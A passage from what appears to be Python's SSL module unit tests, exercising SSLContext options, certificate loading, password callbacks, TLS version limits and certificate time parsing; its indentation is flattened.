def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
